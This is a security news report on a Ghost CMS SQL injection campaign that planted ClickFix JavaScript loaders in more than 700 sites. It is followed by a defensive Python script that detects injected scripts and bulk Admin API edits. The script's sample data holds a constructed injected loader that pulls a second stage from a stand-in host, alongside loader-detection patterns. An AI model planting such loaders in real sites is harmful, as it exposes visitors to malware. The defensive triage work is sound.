Ghost CMS SQL flaw used to hijack 700+ sites
Attackers exploited CVE-2026-26980, a Ghost CMS SQL injection fixed in February 2026, to steal admin API keys and inject JavaScript into more than 700 sites for a ClickFix scam.
Security researchers at QiAnXin XLab reported that attackers exploited CVE-2026-26980, a critical SQL injection in Ghost CMS, to steal administrator API keys and inject malicious JavaScript into over 700 websites. The campaign, first observed on May 7, 2026, used the compromised pages to deliver a ClickFix scam that tricks Windows users into running malware.
The vulnerability affected Ghost’s Content API and carried a CVSS score of 9.4. The flaw allowed an unauthenticated actor to read arbitrary data from a site database, including admin API keys. Ghost released a patch in February 2026 in version 6.19.1 after the issue was discovered with the help of Anthropic’s Claude tool.
Attackers used stolen admin API keys to call the Ghost Admin API and alter published content in bulk. The injected code placed a two-stage JavaScript loader at the bottom of articles. That loader fetched a runtime payload from an external address, clo4shara[.]xyz/11z77u3.php, which QiAnXin XLab identified as a traffic distribution script provided by the Adspect cloaking service.
QiAnXin XLab wrote that “Its core function is to collect various fingerprint information from the user’s browser and upload it to the server, then perform actions such as redirection, popups, and downloads based on the returned instructions.” The cloaking layer served benign content to scanners while delivering the real payload to targeted visitors.
Targeted visitors were shown a fake CAPTCHA inside an iframe and instructed to copy and paste a Base64-encoded command into the Windows Run dialog. That command downloaded a ZIP archive, extracted a batch script, and executed a PowerShell command to fetch a DLL and run it with rundll32.exe. Later variants replaced the DLL with a JavaScript payload. In each case the final objective was to install a Windows executable.
Researchers identified two types of final payloads. One was a signed PuTTY client delivered by a DLL-based dropper. The other was an Inno Setup installer for a modified Electron application based on the open-source Grape desktop client. The Electron app established persistence and polled a command-and-control host, web-telegram[.]ug, every 30 seconds for instructions to run JavaScript or executables.
QiAnXin XLab assessed that at least two separate threat clusters ran the operation and that attackers could contaminate some sites within a single day. Compromised sites included university pages and organizations across blockchain, artificial intelligence, SaaS, security research, media and fintech sectors. The cloaking script used in the campaign supports 19 commands for running arbitrary JavaScript and remotely controlling a browser.
Ghost CMS users are advised to upgrade instances to version 6.19.1, rotate all credentials, remove injected content, review access logs for suspicious activity, and notify site visitors who may have been exposed during the contamination period.
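Two of the recommended steps, removing injected content and reviewing access logs, lend themselves to scripting. The following is an added example (not code from Ghost, QiAnXin XLab or the campaign itself) of how a site operator could triage a Ghost instance: it parses post HTML for script tags that load from, or reference, hosts outside a site-specific allowlist or that behave like a remote-payload loader, and it counts successful Admin API post writes per source address to surface bulk editing of the kind a stolen key enables. It assumes the default Admin API path prefix `/ghost/api/admin/`, a hypothetical allowlist of script hosts, and a reverse proxy writing combined-format logs; every post body and log line below is constructed.

```python
"""Triage helpers for a Ghost site after a content-injection incident.

Added example, not code from Ghost or from QiAnXin XLab. It assumes the
default Ghost Admin API path prefix /ghost/api/admin/ and a site-specific
allowlist of script hosts; all sample posts and log lines are constructed.
"""
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a script tag in post HTML is allowed to load from (hypothetical site).
ALLOWED_SCRIPT_HOSTS = {"example-site.test", "cdn.example-site.test"}

HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Patterns typical of a small inline loader that pulls a second stage remotely.
LOADER_RE = re.compile(r"createElement\(['\"]script['\"]\)|\bfetch\(|XMLHttpRequest|\batob\(")


class _ScriptCollector(HTMLParser):
    """Collect every <script> in a post body as (src attribute, inline text)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def find_suspicious_scripts(post_html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return findings for script tags that reference non-allowlisted hosts
    or that look like a remote-payload loader; an empty list means clean."""
    parser = _ScriptCollector()
    parser.feed(post_html)
    findings = []
    for src, body in parser.scripts:
        hosts = set()
        if src:
            host = urlparse(src).hostname
            if host:
                hosts.add(host)
        hosts.update(HOST_RE.findall(body))
        for host in sorted(hosts - allowed_hosts):
            findings.append(f"script references non-allowlisted host: {host}")
        if LOADER_RE.search(body):
            findings.append("inline script with remote-loader behaviour")
    return findings


# Combined log format as written by a typical reverse proxy in front of Ghost.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
ADMIN_POSTS_PREFIX = "/ghost/api/admin/posts/"  # assumed default Admin API path


def bulk_admin_edits(log_lines, threshold=5):
    """Map source IP -> number of successful Admin API post writes, keeping
    only sources at or above the threshold. Routine editing rarely writes
    many posts in quick succession; a stolen key driving bulk edits does."""
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if (m["method"] in ("PUT", "POST") and m["path"].startswith(ADMIN_POSTS_PREFIX)
                and m["status"].startswith("2")):
            counts[m["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample data.
CLEAN_POST = (
    "<p>Release notes for 6.19.1.</p>"
    '<script src="https://cdn.example-site.test/embed.js"></script>'
)
INJECTED_POST = (
    "<p>Release notes for 6.19.1.</p>"
    "<script>var s=document.createElement('script');"
    "s.src='https://loader.invalid-example.test/stage2.php';"
    "document.body.appendChild(s);</script>"
)
SAMPLE_LOG_LINES = [
    f'198.51.100.7 - - [07/May/2026:10:00:{i:02d} +0000] "PUT /ghost/api/admin/posts/{i}/ HTTP/1.1" 200 512'
    for i in range(6)
] + [
    '203.0.113.5 - - [07/May/2026:11:00:00 +0000] "PUT /ghost/api/admin/posts/42/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [07/May/2026:11:00:01 +0000] "GET /ghost/api/admin/posts/42/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print("clean post:", find_suspicious_scripts(CLEAN_POST))
    print("injected post:", find_suspicious_scripts(INJECTED_POST))
    print("bulk editors:", bulk_admin_edits(SAMPLE_LOG_LINES))
```

In practice the post bodies would come from a Ghost content export or from the Admin API, and the log lines from the proxy in front of the instance; the host allowlist must be tuned per site, since a legitimate analytics or embed script will otherwise be flagged. Flagged posts are candidates for manual review and cleanup, and a source address responsible for a burst of post writes is a starting point for scoping which credentials were used and when.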